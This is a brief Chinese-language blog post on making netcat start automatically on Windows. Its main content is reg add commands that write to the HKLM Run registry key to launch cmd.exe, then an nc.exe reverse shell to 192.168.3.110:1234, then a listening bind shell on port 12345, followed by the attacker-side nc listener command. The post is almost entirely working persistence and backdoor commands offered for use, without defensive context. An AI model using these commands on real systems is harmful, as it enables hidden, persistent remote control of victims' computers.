美文网首页
nc自启动

nc自启动

作者: migrate_ | 来源:发表于2019-11-20 11:38 被阅读0次
    1. 例如开机自启cmd
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v processname /t reg_sz /d "C:\Windows\System32\cmd.exe" /f
    
    1.jpg 2.jpg
    1. 自启nc反弹shell(一)
    #反弹shell
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "processname" /t reg_sz /d "C:\Windows\System32\nc.exe -e cmd.exe 192.168.3.110 1234"
    #接收shell
    nc -lvvp 1234
    
    1. 自启nc反弹shell(二)
    #反弹shell
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "processname" /t reg_sz /d "C:\Windows\System32\nc.exe -Ldp 12345 -e cmd.exe"
    #接收shell
    nc ip port 连接
    

    相关文章

      网友评论

          本文标题:nc自启动

          本文链接:https://www.haomeiwen.com/subject/yxqoictx.html